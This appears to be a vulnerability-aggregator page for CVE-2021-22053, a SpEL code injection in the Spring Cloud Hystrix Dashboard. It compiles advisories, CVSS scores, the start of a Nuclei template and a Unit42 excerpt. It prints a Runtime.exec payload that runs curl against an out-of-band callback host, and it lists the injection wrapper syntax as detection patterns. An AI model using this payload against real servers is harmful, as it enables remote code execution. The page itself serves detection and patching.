CVE-2021-22053
published 2021-11-19CVE-2021-22053: Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request…
PriorityP182high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.69%
95.8th percentile
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | spring_cloud_netflix | — | — |
| vmware | spring_cloud_netflix | >= 2.2.0 < 2.2.10 | 2.2.10 |
Detection & IOCsextracted from sources · hover to see the quote
commandT(java.lang.Runtime).getRuntime().exec("curl http://{{interactsh-url}}")
- →Detect HTTP GET requests targeting the /hystrix/ path with semicolon-delimited path parameters containing SpringEL expression syntax (e.g., __${...}__::.x/), which is the exploitation pattern for CVE-2021-22053. ↗
- →Monitor for out-of-band HTTP callbacks (e.g., via interactsh/canary tokens) triggered by curl or CertUtil user-agents, as the PoC payload exfiltrates via DNS/HTTP interaction.
- →Flag requests where the URI path contains the pattern `;a=a/__${` followed by `}__::.x/` as this is the specific SpEL injection wrapper used in exploitation of this CVE.
- ·Exploitation requires BOTH spring-cloud-netflix-hystrix-dashboard AND spring-boot-starter-thymeleaf to be present in the application; neither alone is sufficient. ↗
- ·The vulnerability affects Spring Cloud Netflix Hystrix Dashboard versions prior to 2.2.10 only; patched versions are not susceptible.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Code injection in spring-cloud-netflix-hystrix-dashboard
ghsa·2021-11-23
CVE-2021-22053 [HIGH] CWE-94 Code injection in spring-cloud-netflix-hystrix-dashboard
Code injection in spring-cloud-netflix-hystrix-dashboard
Applications using the `spring-cloud-netflix-hystrix-dashboard` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
OSV
Code injection in spring-cloud-netflix-hystrix-dashboard
osv·2021-11-23
CVE-2021-22053 [HIGH] Code injection in spring-cloud-netflix-hystrix-dashboard
Code injection in spring-cloud-netflix-hystrix-dashboard
Applications using the `spring-cloud-netflix-hystrix-dashboard` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
VulnCheck
VMware Spring Framework Improper Control of Generation of Code ('Code Injection')
vulncheck·2021·CVSS 8.8
CVE-2021-22053 [HIGH] VMware Spring Framework Improper Control of Generation of Code ('Code Injection')
VMware Spring Framework Improper Control of Generation of Code ('Code Injection')
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Affected: VMware Spring Framework
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-security-trends-cross-site-scripting/; https://dashboa
No detection rules found.
Nuclei
Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
nuclei·CVSS 8.8
CVE-2021-22053 [HIGH] Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Template:
id: CVE-2021-22053
info:
name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
author: forgedhallpass
severity: high
description: |
Spring Cloud Netflix Hystrix Dashboard prior to version
Unit42
Network Security Trends: November 2021 to January 2022
blogs_unit42·2022-05-31
Network Security Trends: November 2021 to January 2022
Threat Research Center
Threat Research
Vulnerabilities
## Network Security Trends: November 2021 to January 2022
Yue Guan
Published: May 31, 2022
Threat Research
Vulnerabilities
Apache Log4j
Attack analysis
Denial of service
Exploit in Wild
Network security trends
## Executive Summary
Unit 42 researchers continually observe network attacks and search for insights that can assist defenders. Here, we summarize key trends from November 2021 to January 2022. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity distribution. We also classify vulnerabilities to provide a clear view of the prevalence of, for example, cross-site scripting or denial of service.
Cross-site scripting stood out as a commonly used t
Unit42
Network Security Trends: November 2021 to January 2022
blogs_unit42·2022-05-31·CVSS 9.8
[CRITICAL] Network Security Trends: November 2021 to January 2022
## Executive Summary
Unit 42 researchers continually observe network attacks and search for insights that can assist defenders. Here, we summarize key trends from November 2021 to January 2022. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity distribution. We also classify vulnerabilities to provide a clear view of the prevalence of, for example, cross-site scripting or denial of service.
Cross-site scripting stood out as a commonly used technique. Among around 6,443 newly published vulnerabilities, we found that a large portion (almost 10.6%) still involve this technique. However, by evaluating around 167 million attack sessions and focusing on the latest exploits in the wild, we conclude that remote code execution
2021-11-19
Published
Exploited in the wild